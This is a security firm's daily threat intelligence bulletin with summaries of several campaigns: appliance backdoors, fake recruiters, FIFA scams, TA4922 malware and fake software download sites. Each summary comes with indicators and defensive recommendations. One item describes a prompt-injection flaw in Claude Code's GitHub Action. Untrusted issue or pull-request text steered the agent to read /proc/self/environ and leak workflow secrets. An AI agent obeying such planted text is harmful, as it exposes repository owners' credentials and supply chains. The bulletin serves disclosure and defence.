Threat Watch Feed
🚩 – IOCs Added
The red flag indicates that Indicators of Compromise (IOCs) have been added to SRA’s Threat Feed used by CyberSOC clients. Articles may not be flagged if IOCs are not available at the time or are not applicable to the article.
🚩 VerdantBamboo Compromises Edge Appliances and MSP Infrastructure to Maintain Long-Term Access
Volexity reported that the Chinese threat actor VerdantBamboo, also tracked as WARP PANDA and UNC5221, compromised Linux- and BSD-based appliances to maintain persistent access while avoiding traditional endpoint monitoring. The activity began with an investigation into suspicious traffic from an Egnyte Storage Sync virtual appliance, which was connecting to attacker-controlled infrastructure behind Cloudflare and using DNS over HTTPS through Google DNS. Volexity ultimately found that the appliance had been compromised with BRICKSTORM, a Golang-based RAT used by VerdantBamboo for command execution, SOCKS proxying, and filesystem access. The investigation uncovered a much longer intrusion timeline, with the Storage Sync appliance and an MSP-managed pfSense firewall compromised for at least 18 months. VerdantBamboo likely used the MSP compromise to obtain credentials and infrastructure details needed to access the victim environment. After remediation, the actor returned by using stolen administrative credentials to access the victim’s exposed firewall, enable web SSL VPN access, pivot internally, and deploy PLENET, a previously undocumented .NET Native AOT backdoor, to a Synology NAS device. Volexity also identified AGENTPSD, a Python reverse shell deployed as a fallback access mechanism if BRICKSTORM became unavailable.
Impact: Successful compromise of firewalls, NAS devices, storage sync appliances, and other edge systems can give threat actors durable access to environments with limited endpoint visibility. VerdantBamboo used appliance-based malware and proxy capabilities to blend in with legitimate traffic, access Microsoft 365, and bypass Conditional Access policies that would otherwise block suspicious logins. The MSP compromise also created downstream risk for customer environments by exposing credentials, management paths, and trusted access relationships. Because these devices often lack EDR coverage and may restrict owner-level forensic access, intrusions can persist for months before detection.
Recommendation:
- Review firewalls, NAS devices, storage sync appliances, VPN systems, and virtualization infrastructure for unexplained administrative access, SSH enablement, modified startup scripts, cron changes, or unexpected binaries.
- Patch Egnyte Storage Sync to version 13.13 or later to address the reported privilege escalation issue. Require MFA for local and administrative accounts on VPNs, firewalls, NAS devices, and management interfaces.
- Restrict appliance administrative interfaces from direct internet exposure and limit access to dedicated management networks or approved source IPs.
- Audit MSP access paths, credentials, management accounts, and remote administration methods for signs of compromise or credential reuse.
- Monitor for suspicious VPN activity involving local accounts, newly enabled web SSL VPN configurations, or administrator logins from unusual infrastructure.
- Review Linux and BSD appliances for BRICKSTORM, PLENET, and AGENTPSD indicators, including unexpected binaries in /usr/sbin/, /usr/local/libexec/ipsec/, and Egnyte-related paths.
- Hunt for suspicious cron entries, including modified /etc/crontab, /etc/cron.d/ files, and changes to /etc/rc.d/cron.
- Monitor for appliance traffic to unusual Cloudflare-backed domains, WebSocket C2 activity, and DNS over HTTPS behavior from systems that do not normally use it.
- Review Microsoft 365 sign-in activity for access routed through internal appliance or VPN IPs that may have been used as threat actor proxy points.
Claude Code GitHub Action Vulnerability Exposed CI/CD Secrets Through AI Agent Prompt Injection
Microsoft Defender Security Research found that Anthropic’s Claude Code GitHub Action could expose CI/CD workflow secrets when an AI agent processed untrusted GitHub content, such as issue bodies, pull request descriptions, or comments. The issue stemmed from a trust-boundary gap where Claude Code’s Bash tool used environment scrubbing and Bubblewrap sandboxing, but the Read tool was not subject to the same isolation. As a result, an attacker-controlled prompt could steer the agent to read /proc/self/environ, exposing the workflow’s ANTHROPIC_API_KEY and potentially other secrets available to the runner. Anthropic mitigated the issue in Claude Code version 2.1.128 by blocking access to sensitive /proc files. Microsoft emphasized that AI-powered CI/CD workflows introduce a different security model because natural language from untrusted sources can influence agent behavior. The research also showed broader prompt injection risk in AI-assisted GitHub workflows, including scenarios where malicious issue content could direct an agent to modify repository files, create pull requests, or leak credentials through logs, issue comments, external fetches, or other tool-enabled channels.
Impact: Successful exploitation could allow an unauthenticated or low-privileged GitHub user to influence an AI agent running inside a CI/CD workflow and expose sensitive secrets from the runner environment. Exposed API keys, GitHub tokens, cloud credentials, package publishing tokens, or internal service credentials could enable unauthorized API usage, repository access, package tampering, cloud compromise, or follow-on software supply chain activity. The risk is highest where AI agents process untrusted GitHub content while also having access to secrets, file-read tools, shell execution, repository write permissions, or external communication channels.
Recommendation:
- Upgrade Claude Code to version 2.1.128 or later. Review all GitHub Actions workflows that use AI agents to process issues, pull requests, comments, commit messages, or repository content.
- Avoid combining untrusted input processing, access to secrets, and external communication or state-changing tools in the same workflow.
- Scope API keys, GitHub tokens, cloud credentials, and package publishing tokens to the minimum permissions required.
- Use separate credentials per workflow and per environment to limit blast radius. Monitor AI workflow credentials for unusual usage, new source IPs, traffic spikes, or access to endpoints not normally used by the workflow.
- Restrict AI agent tools such as Bash, WebFetch, repository write operations, GitHub MCP tools, and broad file-read access unless explicitly required.
- Harden system prompts by clearly defining untrusted surfaces, permitted tasks, and refusal behavior for requests outside the workflow’s purpose.
- Disable or restrict full output logging where secrets could be leaked into GitHub Actions logs.
- Review recent AI workflow runs for suspicious attempts to read environment files, access /proc, echo modified secrets, post unusual comments, or contact external domains.
- Treat prompt injection against AI workflows as part of the CI/CD threat model, not only as an application-layer concern.
Chinese Intelligence Operatives Use Fake Online Recruitment Campaigns to Target Government and Military Personnel
The Five Eyes intelligence alliance has warned that Chinese military intelligence officers are conducting online recruitment campaigns designed to collect sensitive government, military, political, and economic information. The operators reportedly impersonate legitimate think tanks, consulting firms, and human resources organizations and advertise positions on professional networking and recruitment platforms. They target individuals with security clearances, government experience, military backgrounds, or indirect access to sensitive information. After identifying suitable candidates, the operators conduct virtual interviews, assess access to privileged information, and request written reports on geopolitical, defense, and trade-related topics. They then encourage candidates to provide increasingly sensitive information in exchange for financial compensation and often move communications to encrypted messaging platforms. The campaign leverages social engineering techniques to establish long-term relationships and collect information that intelligence services can aggregate and analyze for strategic advantage.
Impact: This threat presents significant risks to government agencies, defense organizations, contractors, research institutions, and private-sector organizations that support critical national infrastructure. Adversaries can exploit trusted professional networking platforms to identify and engage personnel with access to sensitive information without compromising technical systems. Even when individuals share information they believe is unclassified, threat actors can combine multiple data sources to develop detailed intelligence on personnel, operations, capabilities, supply chains, and strategic priorities. Organizations may face the loss of sensitive information, increased insider threat exposure, regulatory consequences, reputational damage, and risks to operational security. Individuals who disclose protected or classified information may face disciplinary action, loss of security clearances, termination of employment, or criminal prosecution.
Recommendation:
- Train employees, contractors, and former personnel to recognize recruitment-based social engineering tactics, including unsolicited job offers related to defense, government policy, intelligence, and national security topics.
- Require personnel with access to sensitive information to report suspicious recruitment attempts, consulting opportunities, or requests for specialized analysis from unknown organizations.
- Verify the legitimacy of recruiters, consulting firms, and think tanks through independent research before engaging in interviews or sharing professional information.
- Establish insider risk monitoring programs that identify unusual external engagements, unauthorized information sharing, or attempts to monetize privileged knowledge.
🚩 FIFA World Cup 2026 Cyberthreat Activity Expands Across Domains, Ticket Scams, Malware, and Credential Exposure
FortiGuard Labs reported a significant increase in FIFA World Cup 2026-themed cybercriminal activity ahead of the tournament, including more than 13,000 newly registered FIFA-related domains between January and May 2026, with approximately 8.8% classified as malicious or suspicious. The report also identified more than 1,700 suspected FIFA impersonation accounts across social media platforms, with activity concentrated on Facebook and Instagram, as well as FIFA-themed scam activity involving fake ticketing websites, resale fraud, fraudulent merchandise stores, fake streaming pages, cryptocurrency scams, and job recruitment phishing.
The report highlights several active threat vectors, including fake ticket checkout pages harvesting billing and payment information, resale scams promoted through Telegram, fraudulent recruitment pages impersonating FIFA and sponsor hiring processes, and malicious or suspicious FIFA-themed applications distributed through third-party sites. FortiGuard Labs also observed FIFA-related credentials in stealer log telemetry, including activity tied to Vidar, LummaC2, and RedLine, along with FIFA-associated employee and organizational accounts appearing in historical breach datasets and underground forums. The report’s infrastructure analysis further identified FIFA-themed domain clusters and hosting overlaps associated with phishing, malware, RATs, Cobalt Strike infrastructure, domain squatting, and fake shopping or ticketing activity.
Impact: FIFA World Cup 2026-related scams may expose fans, travelers, sponsors, employees, and tournament stakeholders to credential theft, payment fraud, malware infection, account takeover, identity theft, and brand impersonation. Fake ticketing, streaming, merchandise, and recruitment campaigns can harvest personal information, payment details, Gmail credentials, and login data, while malicious applications and trojanized APKs may enable persistence, remote communication, credential compromise, and destructive encryption-related activity. The continued appearance of FIFA-related credentials in stealer logs and breach datasets increases the risk of credential stuffing, targeted phishing, and impersonation against FIFA-associated organizations and users.
Recommendation:
- Block or investigate suspicious domains and infrastructure highlighted in FIFA-themed campaigns.
- Educate users to purchase tickets, merchandise, travel packages, and streaming access only through official FIFA, sponsor, broadcaster, or verified reseller channels.
- Track suspicious payment flows tied to ticket resale scams, including cryptocurrency, wire transfer, Apple Pay, Zelle, CashApp, and other peer-to-peer payment methods.
- Maintain monitoring for hacktivist narratives using FIFA World Cup 2026 themes to amplify data leaks, anti-government messaging, or reputational pressure against host-nation institutions.
🚩 TA4922 Expands Global Campaigns Using Localized Lures, New Loaders, RMM Tools, and RAT Payloads
Proofpoint reported that TA4922, a Chinese-speaking financially motivated threat actor, has expanded beyond its historical East Asia targeting to include organizations in Europe and Africa. The actor uses localized lures themed around human resources, payroll, tax, invoicing, and compliance to deliver malware, credential phishing, and fraud-oriented campaigns. Recent activity in March and April 2026 showed a significant increase in operational tempo and tooling diversity, including Atlas RAT, RomulusLoader, SilentRunLoader, ValleyRAT/Winos4.0, and legitimate remote management tools such as AnyDesk and SyncFuture.
TA4922 campaigns commonly use file-sharing services such as GoFile, LimeWire, and MediaFire to host ZIP, RAR, or IMG payloads that contain legitimate executables paired with malicious DLLs for DLL sideloading. Atlas RAT campaigns used HR and invoicing lures against Japan, the United Kingdom, and Germany, while RomulusLoader campaigns delivered additional payloads, including RMM tools, through tax and payroll themes. SilentRunLoader campaigns impersonated tax and benefits authorities and used Python-based malware to download additional payloads and exfiltrate Chrome browser data, including stored credentials, cookies, and browsing information. Proofpoint also assessed with high confidence that TA4922 is likely using LLMs to rapidly develop Python-based loader and stealer variants based on code comments, strings, and unchanged placeholder values.
Impact: Successful compromise can provide TA4922 with remote access, credential theft, browser data theft, surveillance capability, and persistent access that could support fraud, access resale, data theft, or follow-on exploitation. Atlas RAT can collect system information, upload files, load plugins, capture audio and webcam data, keylog, capture clipboard content, and take screenshots. RomulusLoader can inject into processes, communicate with C2 infrastructure, and retrieve follow-on payloads such as RMM tooling. SilentRunLoader can collect Chrome data and exfiltrate it to attacker-controlled infrastructure. The use of localized lures, legitimate file-hosting services, DLL sideloading, RMM tools, and multiple malware families may make detection more difficult across geographically diverse environments.
Recommendation:
- Block or investigate TA4922 C2 infrastructure, including
206.238.115[.]58,154.211.86[.]110,43.156.77[.]97,103.214.172[.]33,18.139.83[.]110, andws.ztts88[.]cyou. - Hunt for ZIP, RAR, or IMG archives that contain legitimate executables paired with suspicious DLLs such as
libcef.dll,vulkan-1.dll, or other DLLs used for sideloading. - Monitor for execution from temporary user paths such as
%TEMP%,%APPDATA%, Downloads, and mounted IMG files. - Review systems for unauthorized AnyDesk or SyncFuture installation, especially where installed shortly after execution of downloaded archives or suspicious DLL sideloading chains.
- Alert on suspicious outbound traffic to non-standard ports such as TCP
886,1234,7880, or7881from processes not expected to use those ports. - Monitor for process injection into
svchost.exe,dllhost.exe, or other long-lived Windows processes following execution of downloaded business-themed archives. - Hunt for Chrome credential and cookie theft behaviors, including unusual access to Chrome user data directories followed by HTTP POST traffic to unknown infrastructure.
- Enforce application allowlisting for trusted directories and restrict execution from user-writable paths.
- Apply least-privilege controls to reduce local administrator access and limit malware ability to persist, inject, or deploy RMM tools.
Fake Open-Source Project Sites Use Click Hijacking and TDS Redirects to Deliver Malware
Check Point Research reported a large-scale malware distribution ecosystem that impersonates open-source and freeware projects to capture search traffic and route users through a gated Traffic Distribution System. The fake sites mimic trusted software portals, including security and reverse-engineering tools such as Ghidra, dnSpy, and ILSpy, and often preserve legitimate-looking links to real upstream GitHub repositories. However, when users click a download button, CloudFront-hosted JavaScript intercepts the interaction and redirects the browser into a TDS chain rather than the visible download destination.
The TDS uses first-visit logic, click confirmation, anti-bot and anti-analysis checks, VPN and datacenter filtering, browser fingerprinting, geo-based routing, and frequency capping to determine which users are redirected to downstream payload infrastructure. Check Point observed multiple malware families delivered through this ecosystem, including RemusStealer, AnimateClipper, and SessionGate. SessionGate stood out as a heavily gated multi-stage framework with per-session payload generation and one-time-style key release, while RemusStealer targeted browsers, extensions, password managers, 2FA tools, and crypto wallets. AnimateClipper used a ClickFix-style lure and on-chain C2 resolution to deploy a crypto clipper that replaces copied wallet addresses with attacker-controlled addresses.
Impact: Users searching for trusted freeware or open-source tools may unknowingly download malware from professional-looking impersonation sites, even when the visible link appears to point to a legitimate project. This creates elevated risk for security researchers, developers, IT administrators, and technical users who may search for tools such as Ghidra, dnSpy, ILSpy, grpcurl, MQTT Explorer, or disk utilities. Successful infection may result in credential theft, browser data theft, password manager and crypto wallet targeting, clipboard hijacking, unwanted software installation, or follow-on malware delivery through gated payload chains that are difficult to reproduce during analysis.
Recommendation:
- Require users to download security tools, developer utilities, and freeware directly from verified vendor domains, official repositories, or approved internal software portals.
- Block or investigate access to lookalike domains such as
ghidralite[.]com,dnspy[.]org,ilspy[.]org,grpcurl[.]com,mqttexplorer[.]com,mfcmapi[.]com,crystaldiskmark[.]org, and similar project impersonation sites. - Monitor for CloudFront-hosted JavaScript staging URLs tied to suspicious download portals, especially scripts that intercept click or mousedown events and redirect users away from visible
hrefdestinations. - Hunt for SessionGate indicators, including traffic to
appfreshstart[.]com,appgetonline[.]com,webinnosetup[.]com,appmakingcenter[.]com,yourfastcrc[.]com,mobileversioncrc[.]com,webcrcprove[.]com, andintegritycrc[.]com. - Monitor for suspicious 7-Zip SFX installers, oversized binaries with padding, encrypted embedded modules, manual PE mapping, and payloads that fall back to benign installer behavior when analysis gates fail.
- Review endpoint activity for ClickFix-style execution involving
mshta.exeretrieving remote content, especially URLs such ashttps://185.0xA1.0xFB[.]58/navy.7zor suspicious.rtfresources that are actually script or archive content. - Detect crypto clipper behavior, including processes that monitor clipboard contents and replace wallet-like strings across multiple blockchain address formats.
- Hunt for RemusStealer C2 endpoints such as
buccstanor[.]pics,baxe[.]pics,intem[.]lat,ropea[.]top,forestoaker[.]com, and related IP-based URLs.
Sign up here!
To receive the TIGR Threat Watch email bulletin and critical vulnerability notifications, simply complete the form below.
Follow on Twitter
@SRA_ThreatWatch will keep you up to date with the most recent posts on your social media feed.
Subscribe to the RSS
Just copy and add this link to your RSS app and be notified immediately when new intel is posted.
How to use RSS
Following the RSS feed is easy. RSS can be added in your Outlook desktop app, and there are many free RSS readers available for your mobile device.
To follow using Outlook:
- In Outlook, right-click the RSS Feeds folder and choose Add a New RSS Feed.
- In the New RSS Feed dialog box, enter the URL of the RSS Feed: https://sra.io/category/tigr/feed
(click here for detailed instructions and additional options for Outlook)
Popular mobile RSS reader apps include:
- Feedly
- NewsBlur
- RSS Reader
- Inoreader
After installing your preferred RSS reader, you will be able to add this feed by entering the URL: https://sra.io/category/tigr/feed
Threat Bulletin Archive
About TIGR Threat Watch
Our Threat Intelligence Gathering & Research (TIGR) team is focused on threat intelligence and curates a daily intelligence report, TIGR Threat Watch, with information collected from several industry intel sources. We also create and publish ad-hoc critical vulnerability notifications in case of critical and time-sensitive vulnerabilities or threats. These notifications include details and recommendations for mitigation/remediation.